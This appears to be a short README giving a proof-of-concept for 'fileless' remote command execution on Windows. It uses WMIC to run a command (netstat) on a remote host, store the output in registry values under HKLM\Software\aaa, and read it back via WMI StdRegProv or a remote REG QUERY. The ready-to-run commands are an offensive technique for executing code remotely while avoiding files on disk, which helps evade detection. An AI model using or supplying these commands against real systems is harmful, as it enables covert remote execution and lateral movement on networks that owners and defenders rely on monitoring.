# FILELESS remote wmi output
This is a snipped for a POC on how to run a remote process using WMIC, and get the output out without dropping a file to disk, in case you need to do that.

It using cmd.exe tricks to write the output into the registry, then uses remtoe registry reads to the get the output back.

# Step 1: remote process execution into registry:
For example, the following with run a netstat on a remote machine, piping the output in the registrly, one key per line:
```
wmic /NODE:<ip_address> /USER:<username> process call create "cmd /V:ON /C @echo off && ( for /F \"tokens=* delims=; \" %i in ('netstat.exe -ano') do (set /A COUNTER=COUNTER+1 && REG ADD HKLM\Software\aaa /v \"output!COUNTER!\" /t REG_SZ /d \"%i\" /f ) ) && pause"
```

# Step 2: remote registry read to the the output
Either do:
```
for /L %a in (1,1,70) Do WMIC /NODE:<ip_address> /USER:<username> /PASSWORD:<password> /NameSpace:\\root\default Class StdRegProv Call GetStringValue hDefKey="&H80000002" sSubKeyName="Software\aaa" sValueName="output%a"
```
or:
```
runas /netonly /user:<username> "cmd /C REG QUERY \\<ip_address>\HKLM\SOFTWARE\aaa && pause"
```